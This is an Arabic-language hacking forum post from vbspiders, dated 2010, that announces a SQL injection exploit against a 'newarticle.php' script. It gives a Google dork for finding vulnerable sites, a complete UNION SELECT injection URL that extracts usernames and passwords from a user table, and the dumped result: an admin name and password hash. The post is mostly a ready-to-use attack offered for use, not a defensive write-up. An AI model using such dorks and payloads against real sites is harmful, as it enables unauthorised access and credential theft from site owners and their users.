ثغرة أعلن عنها لأول مرة هنا في منتدى vbspiders

[soufhak]

بسم الله الرحمان الرحيم

السلام عليكم و رحمة الله و بركاته و بعد

#

Exploit Title : Sql Injection Vulnerability
# Date : 18-08-2010
# Author : soufhacker
# Version : All Versions

###############################################
Dork google: inurl:newarticle.php?id=
###############################################
Exploit:
http://site.com/path/newarticle.php?id=-805+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29+from+access_all_areas.user--

###############################################
username : Admin
password : $1$V-s+pArA$T9V7JXDNeJ2AqiV9kfgCl/
Done!
#############soufhacker################

المصدر: :: vBspiders Professional Network ::

---

eyvm Hugk ukih gH,g lvm ikh td lkj]n vbspiders